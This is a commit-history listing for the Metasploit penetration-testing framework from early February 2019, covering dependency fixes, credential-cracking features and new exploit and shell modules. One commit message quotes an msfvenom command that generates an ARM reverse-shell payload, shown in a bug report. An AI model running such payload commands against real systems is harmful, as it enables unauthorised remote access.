Commit Graph

50602 Commits (c131b21af4e4f13f2b994cce361cd4e470d09382)

Author SHA1 Message Date
Jeffrey Martin 0fe3281094
lock sqlite3 to compatible minor not just major 2019-02-05 23:32:28 -06:00
William Vu 5e4139dcef Add notes on stability and side effects 2019-02-05 20:51:34 -06:00
William Vu 16a58ab3c3 Merge remote-tracking branch 'upstream/master' into feature/crockpot 2019-02-05 20:48:05 -06:00
Adam Cammack fb0d929f42
Land #11362, Lock sqlite3 until binaries are up 2019-02-05 11:36:57 -06:00
Jeffrey Martin fb7ddebd28
restrict sqlite3 gem for windows 2019-02-05 07:34:07 -06:00
Metasploit 5b41c7cccc
automatic module_metadata_base.json update 2019-02-05 05:28:20 -08:00
Jacob Robles 15f624b745
Land #11304, Add CVE-2018-1000999 to MailCleaner module 2019-02-05 07:19:32 -06:00
h00die a0d668244b update ipcamera docs 2019-02-05 05:12:03 -05:00
h00die cb3f91af0c add bsdi to creds help and what the hashes start with 2019-02-04 17:02:50 -05:00
Brendan Coles d38e12c124 Add URL scheme and Base64.encode64 checks to msftdiy 2019-02-04 21:16:01 +00:00
Luis Rosa 39d0fff909 add support for read and write SDW and MDW operands 2019-02-04 15:56:16 +00:00
Metasploit 7cddbcbc65
automatic module_metadata_base.json update 2019-02-04 05:04:46 -08:00
Brent Cook b13129f9fb
Land #11348, Add nil check to enum_patches 2019-02-04 05:25:42 -06:00
Brent Cook ac94557a15
Land #11347, add version check to Safari RCE exploit 2019-02-04 05:22:01 -06:00
Brent Cook fcb4230cf9
Land #11278, Update Travis CI to run remote data service spec tests 2019-02-04 05:17:12 -06:00
h00die 45cb54d265 remove comment from jtr_oracle_fast 2019-02-03 14:31:58 -05:00
h00die ed0a3ea084 more spec modification for creds 2019-02-03 14:04:38 -05:00
h00die fbd81dd6aa ipcamera password disclosures 2019-02-03 13:40:22 -05:00
h00die 53b488ce08 fix creds spec for jtr improvements 2019-02-03 12:58:35 -05:00
h00die e93f215ac1 apply_pot delete files 2019-02-03 10:24:05 -05:00
h00die 748e1468b3 creds upgrade and apply_pot 2019-02-03 10:17:25 -05:00
Brendan Coles f2d333f3f4
Land #11350, Add missing `to_linux_armle_elf_dll` method to Msf::Util::EXE
Allow generation of ARMLE shared object payloads
2019-02-03 06:24:58 +00:00
Brendan Coles 6f31b1a110 Change default payload to reverse_bash 2019-02-03 06:18:31 +00:00
Brendan Coles 46230efcd8 Update documentation 2019-02-03 06:18:18 +00:00
Brendan Coles 9c3368f325 Add Evince CBT File Command Injection module 2019-02-03 05:38:56 +00:00
Nathan 2d7c075f81
undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Error: undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
Did you mean?  to_linux_armle_elf
               to_linux_x64_elf_dll
               to_linux_x86_elf_dll```
2019-02-03 16:34:30 +11:00
Spencer McIntyre 0908d5a2d2 Rename default_options to describe_payload_options 2019-02-02 15:01:05 -05:00
Brendan Coles 28283809f9 Add nil check to enum_patches 2019-02-02 15:33:48 +00:00
h00die c5bfee1df7 add jtr to creds command 2019-02-01 20:25:03 -05:00
Brendan Coles 787c4400e4 Add Solaris pfexec Upgrade Shell module 2019-02-01 22:58:21 +00:00
Metasploit 3f35c82674
automatic module_metadata_base.json update 2019-02-01 14:38:15 -08:00
bwatters 239cce53ea
Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master
2019-02-01 16:21:24 -06:00
Metasploit 804c441425
Bump version of framework to 5.0.5 2019-02-01 13:44:12 -08:00
Metasploit bb850f7b51
automatic module_metadata_base.json update 2019-02-01 13:29:24 -08:00
Wei Chen 7fe381ac60
Land #11309, Normalize newlines in CommandShell#run_single 2019-02-01 15:17:24 -06:00
William Vu d4211b1399
Land #11343, Ubiquiti discovery PR fixes 2019-02-01 15:11:23 -06:00
William Vu 61b468ac7d Add URL reference to blog post 2019-02-01 14:49:33 -06:00
William Vu 181d61621f Count to five correctly 2019-02-01 14:40:43 -06:00
William Vu 7b88277c6f Prefer case statement over long if block 2019-02-01 14:40:09 -06:00
Brendan Coles 47a13ea0e8 Modify Post read_file to check if file is readable 2019-02-01 19:44:18 +00:00
bwatters 2640ecb4c4
Land #11338, Add module to discover Ubiquiti devices
Merge branch 'land-11338' into upstream-master
2019-02-01 11:40:52 -06:00
Wei Chen ba69a0b26a
Land #11310, MSF API to zip instead of relying on system() 2019-02-01 11:32:20 -06:00
Spencer McIntyre 6343280364 Clean up external evasion module options 2019-02-01 11:54:22 -05:00
Brendan Coles d9e3fb7d2c
Land #11339, Move command_exists? method to Msf::Post::Common 2019-02-01 16:07:47 +00:00
William Vu 62560f9581 Add rudimentary Windows support to command_exists? 2019-01-31 22:07:30 -06:00
William Vu d0d383c8db Move command_exists? to Msf::Post::Common 2019-01-31 22:04:29 -06:00
Jon Hart f0519a5af5
Minor syntax; add logging for unhandled fields 2019-01-31 18:41:27 -08:00
Jeffrey Martin 5cf97fd09b
remove nolonger used variable 2019-01-31 13:05:02 -06:00
Spencer McIntyre 162139ee1d Keep advanced options in the same list 2019-01-31 13:41:18 -05:00
spinfoo 07e2f9c166 added documentation 2019-01-31 19:24:47 +01:00